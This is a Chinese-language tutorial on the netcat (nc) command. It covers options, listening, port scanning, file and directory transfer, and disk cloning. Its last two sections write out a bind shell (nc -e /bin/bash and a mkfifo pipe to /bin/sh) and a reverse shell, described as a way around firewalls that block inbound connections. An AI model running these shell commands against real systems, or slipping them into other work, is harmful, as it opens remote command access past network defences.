nc(NetCat)命令

瑞士军刀netcat官网:http://netcat.sourceforge.net/

安装:yum install -y nc
查询:rpm -q nc

语法:nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>][-s<来源地址>][-v...][-w<超时秒数>][主机名称][通信端口...]
说明:执行本指令可设置路由器的相关参数。

建立连接: nc [-options] hostname port[s] [ports] …
绑定端口等待连接: nc -l port [-options] [hostname] [port]

参数:

-g<网关> 设置路由器跃程通信网关,最多可设置8个。

-G<指向器数目> 设置来源路由指向器,其数值为4的倍数。

-h 在线帮助。

-i<延迟秒数> 设置时间间隔,以便传送信息及扫描通信端口。

-l 使用监听模式,管控传入的资料。

-n 直接使用IP地址,而不通过域名服务器。

-o<输出文件> 指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存。

-p<通信端口> 设置本地主机使用的通信端口。

-r 乱数指定本地与远端主机的通信端口。

-s<来源地址> 设置本地主机送出数据包的IP地址。

-u 使用UDP传输协议。

-v 显示指令执行过程。

-w<超时秒数> 设置等待连线的时间。

-z 使用0输入/输出模式,只在扫描通信端口时使用。

★使用例:

1,连接到远程主机
nc -nvv 192.168.0.1 80 //连接到80端口
2,监听本地主机
创建默认tcp监听:nc -l 80 //监听本机的tcp 80端口。
创建udp监听:nc -ul 9999

查看:netstat -antup |grep 9998
客户端测试udp连接方法:nc -vuz 192.168.0.1 9999
客户端测试tcp连接方法:nc -vz -w 2 192.168.0.1 9999 //超时2秒


3,超时
使用-w参数指定连接空闲超时的时间,默认为秒数。连接超过指定时间将被断开。-w参数在服务器端无效。
服务器端:nc -l 8080
客户端: nc -w 60 192.168.0.1 8080 //-w 60指定60秒后自动断开。

4,端口扫描
nc -z -v -n 192.168.1.1 21-25 //扫描21到25开放的端口
•可以运行在TCP或者UDP模式,默认是TCP,-u参数调整为udp.
-z 参数告诉netcat使用0 IO,连接成功后立即关闭连接, 不进行数据交换.
-v 参数指详细输出.
-n 参数告诉netcat 不要使用DNS反向查询IP地址的域名.

扫描udp端口:nc -vuz 192.168.0.1 80-90

5,聊天
服务器端:nc -l 8888 //监听8888端口
客户端: nc 服务端IP 8888
然后即可畅聊了。

6,文件传输
①文件从服务器传输到客户端。
服务器命令:nc -l 8888 < file01.txt //当客户端连接到服务器的8888端口时,文件file01.txt的内容就会传给客户端。
客户端命令:nc -n 服务器IP 8888 > file02.txt //客户端接收的文件内容重定向到file02.txt中

②文件从客户端传递到服务器,此时,没有必要改变服务器和客户端的角色。方法是类似的,直接用以下命令传递即可。
服务器命令:nc -l 8888 > file01.txt
客户端命令:nc -n 服务器IP 8888 < file02.txt

7,目录传输
方法与上面文件传输类似,使用压缩工具tar.
服务器命令:tar -cvf – dir_name | nc -l 8888 //压缩后重定向给服务器。
客户端命令:nc -n 服务器IP 8888 | tar -xvf - //接收到文件内容直接解压缩

•使用bzip2压缩效率高,节约带宽。

服务器命令:tar -cvf – dir_name| bzip2 -z | nc -l 8888
客户端命令:nc -n 服务器IP 8888 | bzip2 -d |tar -xvf -

8,克隆一个设备
如果你已经安装配置一台Linux机器并且需要重复同样的操作对其他的机器,而你不想在重复配置一遍。不在需要重复配置安装的过程,
只启动另一台机器的一些引导可以克隆你的机器。
克隆Linux PC很简单,假如你的系统在磁盘/dev/sda上
服务端:dd if=/dev/sda | nc -l 20000
客户端;nc -n 服务器IP 8888 | dd of=/dev/sda
dd是一个从磁盘读取原始数据的工具,我通过netcat服务器重定向它的输出流到其他机器并且写入到磁盘中,
它会随着分区表拷贝所有的信息。但是如果我们已经做过分区并且只需要克隆root分区,我们可以根据我们系统root分区的位置,更改sda 为sda1,sda2.等等。

9,指定源地址
假设你的机器有多个地址,希望明确指定使用哪个地址用于外部数据通讯。我们可以在netcat中使用-s选项指定ip地址。

服务器端:nc -u -l 9999 < file.txt //服务器的IP:192.168.1.1
客户端:nc -u 192.168.1.1 9999 -s 172.16.0.1 > file.txt //客户端使用172.16.0.1建立连接。
该命令将绑定地址 172.16.0.1。

10,指定源端口
假设你的防火墙过滤除25端口外其它所有端口,你需要使用-p选项指定源端口。

服务器端:nc -l 20000
客户端:nc 192.168.1.1 20000 25
使用1024以内的端口需要root权限。
该命令将在客户端开启25端口用于通讯,否则将使用随机端口。

11,打开一个shell
我们已经用过远程shell-使用telnet和ssh,但是如果这两个命令没有安装并且我们没有权限安装他们,我们也可以使用netcat创建远程shell。
假设你的netcat支持 -c -e 参数(原生 netcat)。
服务器端:nc -l 20000 -e /bin/bash -i
客户端:nc 192.168.1.1 20000

这里我们已经创建了一个netcat服务器并且表示当它连接成功时执行/bin/bash
假如netcat 不支持-c 或者 -e 参数(openbsd netcat),我们仍然能够创建远程shell

服务器端:
mkfifo /tmp/tmp_fifo
cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 20000 > /tmp/tmp_fifo
这里我们创建了一个fifo文件,然后使用管道命令把这个fifo文件内容定向到shell 2>&1中。是用来重定向标准错误输出和标准输出,
然后管道到netcat 运行的端口20000上。至此,我们已经把netcat的输出重定向到fifo文件中。
说明:
从网络收到的输入写到fifo文件中
cat 命令读取fifo文件并且其内容发送给sh命令
sh命令进程受到输入并把它写回到netcat。
netcat 通过网络发送输出到client
至于为什么会成功是因为管道使命令平行执行,fifo文件用来替代正常文件,因为fifo使读取等待而如果是一个普通文件,cat命令会尽快结束并开始读取空文件。
在客户端仅仅简单连接到服务器。

12,反向shell
反向shell是指在客户端打开的shell。反向shell这样命名是因为不同于其他配置,这里服务器使用的是由客户提供的服务。

服务器端:nc -l 20000

在客户端,简单地告诉netcat在连接完成后,执行shell。

客户端:nc 192.168.1.1 20000 -e /bin/bash

反向shell经常被用来绕过防火墙的限制,如阻止入站连接。例如,我有一个专用IP地址为192.168.1.1,我使用代理服务器连接到外部网络。
如果我想从网络外部访问 这台机器如1.2.3.4的shell,那么我会用反向外壳用于这一目的。

猜你喜欢

转载自www.cnblogs.com/mountain2011/p/10745967.html